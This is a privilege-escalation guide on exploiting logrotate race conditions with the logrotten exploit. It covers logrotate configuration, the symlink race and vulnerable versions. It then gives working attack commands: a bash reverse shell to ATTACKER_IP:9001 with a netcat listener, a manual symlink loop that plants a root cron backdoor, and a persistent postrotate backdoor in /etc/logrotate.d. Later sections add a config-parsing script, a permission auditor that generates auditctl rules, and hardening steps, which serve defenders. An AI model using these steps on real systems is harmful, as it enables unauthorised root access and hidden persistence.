
Logrotate Exploitation

Guide to exploiting logrotate misconfigurations for privilege escalation using race conditions and the logrotten exploit.

Jan 20, 2026
Updated Dec 11, 2025

Introduction

Logrotate is a system utility that manages log file rotation, compression, and removal. It runs periodically via cron with root privileges to handle log files across the system. Certain versions of logrotate contain race condition vulnerabilities that can be exploited for privilege escalation.

Requirements

To exploit logrotate, you need:

  1. Write permissions on a log file that logrotate manages
  2. Logrotate running as root (default behavior)
  3. Vulnerable version: 3.8.6, 3.11.0, 3.15.0, or 3.18.0

Understanding Logrotate

Configuration

Global configuration is in /etc/logrotate.conf:

cat /etc/logrotate.conf

# rotate log files weekly
weekly

# use the adm group
su root adm

# keep 4 weeks worth of backlogs
rotate 4

# create new log files after rotating
create

# include per-application configs
include /etc/logrotate.d

Application Configs

Per-application configs in /etc/logrotate.d/:

ls /etc/logrotate.d/
apache2  apt  dpkg  mysql  rsyslog  samba

cat /etc/logrotate.d/dpkg
/var/log/dpkg.log {
    monthly
    rotate 12
    compress
    delaycompress
    missingok
    notifempty
    create 644 root root
}

Status File

Logrotate tracks rotation dates in a status file:

cat /var/lib/logrotate.status

"/var/log/samba/log.smbd" 2024-8-3
"/var/log/mysql/mysql.log" 2024-8-3

Vulnerability Analysis

The Race Condition

Logrotate creates new log files with a predictable sequence:

  1. Rename existing log file
  2. Create new log file
  3. Set permissions on new file

Between steps 2 and 3, there's a window where an attacker can replace the new file with a symlink, causing logrotate to write to an arbitrary location.

Vulnerable Versions

  • 3.8.6
  • 3.11.0
  • 3.15.0
  • 3.18.0

Check version:

logrotate --version

Exploitation

Using Logrotten

Logrotten automates exploitation of the race condition.

Compile the Exploit

git clone https://github.com/whotwagner/logrotten.git
cd logrotten
gcc logrotten.c -o logrotten

Create Payload

# Reverse shell payload
cat > payload << 'EOF'
bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1
EOF

Determine Logrotate Option

grep "create\|compress" /etc/logrotate.conf | grep -v "#"

  • If create is used: use default logrotten
  • If compress is used: use logrotten -c

Start Listener

nc -nlvp 9001

Execute Exploit

# For 'create' option (most common)
./logrotten -p ./payload /tmp/target.log

# For 'compress' option
./logrotten -c -p ./payload /tmp/target.log

Manual Exploitation

If you have write access to a log file and the directory:

# Create symlink race condition
while true; do
    # Wait for rotation
    if [ ! -f /var/log/app/app.log ]; then
        ln -sf /etc/cron.d/backdoor /var/log/app/app.log
        break
    fi
    sleep 0.1
done

# Prepare cron backdoor content
echo "* * * * * root /tmp/shell.sh" > /tmp/cron_payload

Identifying Writable Logs

# Find writable log files
find /var/log -writable -type f 2>/dev/null

# Check log directories
find /var/log -writable -type d 2>/dev/null

# Find logs managed by logrotate
cat /etc/logrotate.d/* | grep "^/" | cut -d' ' -f1

Forcing Log Rotation

Normally logrotate runs via cron (daily). To force rotation:

# Force rotation (requires root or sudo)
sudo logrotate -f /etc/logrotate.conf

# Or modify status file to backdate
# This makes logrotate think rotation is due

Persistence via Logrotate

If you have write access to /etc/logrotate.d/, you can create persistent backdoors:

cat > /etc/logrotate.d/backdoor << 'EOF'
/var/log/backdoor.log {
    daily
    rotate 1
    postrotate
        /tmp/shell.sh
    endscript
}
EOF

The postrotate script runs as root after rotation.
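The one-liners earlier (grep for create/compress in logrotate.conf, grep "^/" over /etc/logrotate.d) each pull one fact out of the stanzas, and the stanza just above shows that the scripts inside a stanza matter as much as its paths. The parser below is an added example, not code from this guide or from the logrotate project: it reads a set of logrotate config files and prints, per managed path, whether create or compress is in force for that stanza (global defaults from logrotate.conf are inherited, per-stanza directives override them) and which prerotate/postrotate/firstaction/lastaction/preremove commands the stanza runs, so a reviewer can see at a glance which stanzas execute something out of /tmp or another location a non-root user can write. It assumes POSIX sh and awk; the function name and the tab-separated output format are this example's own choices, and include lines are not followed, so pass /etc/logrotate.conf and /etc/logrotate.d/* explicitly.

```shell
#!/bin/sh
# Added example (not part of the original guide): print every log path that a set
# of logrotate config files manages, with the create/compress setting in force for
# its stanza and any rotate-time script commands.
# Usage: logrotate_paths /etc/logrotate.conf /etc/logrotate.d/*
# Output: one line per path, four tab-separated fields:
#   <path>  create|nocreate  compress|nocompress  <script commands joined by "; ", or "-">
# Limitations: "include" lines are not followed (pass the included files yourself)
# and a quoted path that contains spaces is split on the spaces.
logrotate_paths() {
    awk '
    function trim(s) { sub(/^[ \t]+/, "", s); sub(/[ \t]+$/, "", s); return s }
    function open_stanza() { instanza = 1; create = gcreate; compress = gcompress; script = "" }

    # Comments and blank lines carry nothing.
    /^[ \t]*#/ || /^[ \t]*$/ { next }

    # Inside postrotate/prerotate/firstaction/lastaction/preremove: collect the
    # commands verbatim until the matching endscript.
    inscript {
        if ($1 == "endscript") inscript = 0
        else script = (script == "" ? "" : script "; ") trim($0)
        next
    }

    # Top level: absolute path tokens (quoted or globbed) accumulate until a "{"
    # opens the stanza; any other line is a global default.
    !instanza {
        if (($1 ~ /^\//) || ($1 ~ /^"\//)) {
            for (i = 1; i <= NF; i++) {
                if ($i == "{") open_stanza()
                else { p = $i; gsub("\"", "", p); paths[++npaths] = p }
            }
        }
        else if ($1 == "{")          open_stanza()
        else if ($1 == "create")     gcreate = 1
        else if ($1 == "nocreate")   gcreate = 0
        else if ($1 == "compress")   gcompress = 1
        else if ($1 == "nocompress") gcompress = 0
        next
    }

    # Stanza end: one output line per path, then forget the stanza.
    $1 == "}" {
        c = create ? "create" : "nocreate"
        z = compress ? "compress" : "nocompress"
        s = (script == "") ? "-" : script
        for (i = 1; i <= npaths; i++) printf "%s\t%s\t%s\t%s\n", paths[i], c, z, s
        npaths = 0; instanza = 0
        next
    }

    # Directives inside the stanza that override the global defaults.
    $1 == "create"     { create = 1 }
    $1 == "nocreate"   { create = 0 }
    $1 == "compress"   { compress = 1 }
    $1 == "nocompress" { compress = 0 }
    $1 ~ /^(postrotate|prerotate|firstaction|lastaction|preremove)$/ { inscript = 1 }
    ' "$@"
}

# Run directly with the config files as arguments; sourced, it only defines the function.
if [ $# -gt 0 ]; then
    logrotate_paths "$@"
fi
```

Pipe the output through `awk -F'\t' '$4 != "-"'` to keep only stanzas that run scripts, or through `cut -f1` for the bare path list; a script command that lives under /tmp, /var/tmp, /dev/shm or a home directory is the thing to review first, because whatever it points at runs as root on the next rotation.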

Detection and Defense

Hardening

# Ensure proper permissions on logrotate configs
chmod 644 /etc/logrotate.conf
chmod 644 /etc/logrotate.d/*

# Restrict write access to log directories
chmod 750 /var/log

# Update logrotate to patched version
apt update && apt upgrade logrotate

Detection

  • Monitor for new files in /etc/logrotate.d/
  • Watch for symlink creation in log directories
  • Alert on unexpected processes spawned by logrotate
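The hardening commands and detection bullets above describe what to check; the script below is an added example (not code from this guide, from logrotate or from auditd) that does the checking for each managed log path and prints auditctl rules for the first two detection points. It assumes POSIX sh and find, and auditd for the rules; the finding names and the audit keys logrotate_conf and logrotate_symlink are this example's own. Feed it one managed log path per line (the grep "^/" listing from the Identifying Writable Logs section, or any other source); globs are expanded.

```shell
#!/bin/sh
# Added example, not code from the guide or from logrotate: check the filesystem
# preconditions the race needs for each managed log path, and print auditctl
# rules for the configuration-change and symlink-creation detections.
# Input on stdin: one managed log path per line; globs such as /var/log/app/*.err
# are expanded, and anything after a tab on the line is ignored.
# Findings, one per line, "<finding> <path>" (names are this example's own):
#   dir-writable-by-others   parent directory has o+w and no sticky bit
#   dir-writable-by-group    parent directory has g+w
#   symlink                  the log path is already a symbolic link
#   file-writable-by-others  the log file itself has o+w
audit_log_paths() {
    cut -f1 | sort -u | while IFS= read -r pattern; do
        dir=$(dirname "$pattern")
        [ -d "$dir" ] || continue
        # -prune stops find from descending into the directory, and octal -perm
        # is POSIX, so this works with GNU and BSD find. Testing the mode bits
        # rather than "[ -w ]" keeps the result correct when run as root.
        if [ -n "$(find "$dir" -prune -perm -002 ! -perm -1000 -print)" ]; then
            echo "dir-writable-by-others $dir"
        fi
        if [ -n "$(find "$dir" -prune -perm -020 -print)" ]; then
            echo "dir-writable-by-group $dir"
        fi
        # Unquoted on purpose: expand the glob to the log files that exist now.
        for f in $pattern; do
            if [ -L "$f" ]; then
                echo "symlink $f"      # a symlink always shows mode 777, so stop here
                continue
            fi
            [ -f "$f" ] || continue
            if [ -n "$(find "$f" -prune -perm -002 -print)" ]; then
                echo "file-writable-by-others $f"
            fi
        done
    done
}

# auditctl rules for the first two detection points: writes under the logrotate
# config paths, and symlink creation inside each directory that holds a managed
# log. Same stdin format as audit_log_paths. Audit keys are this example's own.
logrotate_audit_rules() {
    echo "-w /etc/logrotate.conf -p wa -k logrotate_conf"
    echo "-w /etc/logrotate.d -p wa -k logrotate_conf"
    cut -f1 | while IFS= read -r pattern; do dirname "$pattern"; done | sort -u |
        while IFS= read -r dir; do
            # Both ABIs, so a 32-bit binary on a 64-bit kernel is not missed.
            for arch in b64 b32; do
                echo "-a always,exit -F arch=$arch -S symlink,symlinkat -F dir=$dir -k logrotate_symlink"
            done
        done
}

# Run directly:  sh audit_logrotate.sh --audit < paths.txt
#                sh audit_logrotate.sh --rules < paths.txt > /etc/audit/rules.d/logrotate.rules
case "${1:-}" in
    --audit) audit_log_paths ;;
    --rules) logrotate_audit_rules ;;
esac
```

Findings are reported per directory, so tightening can be limited to the directories that are actually exposed; a blanket chmod 750 on /var/log itself also denies traversal to every non-root service that writes its own logs under it. The third detection bullet, processes spawned by logrotate, is a correlation on the parent of execve records rather than a path or syscall watch, and is not covered by these rules.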

Logrotate Exploitation | Drake Axelrod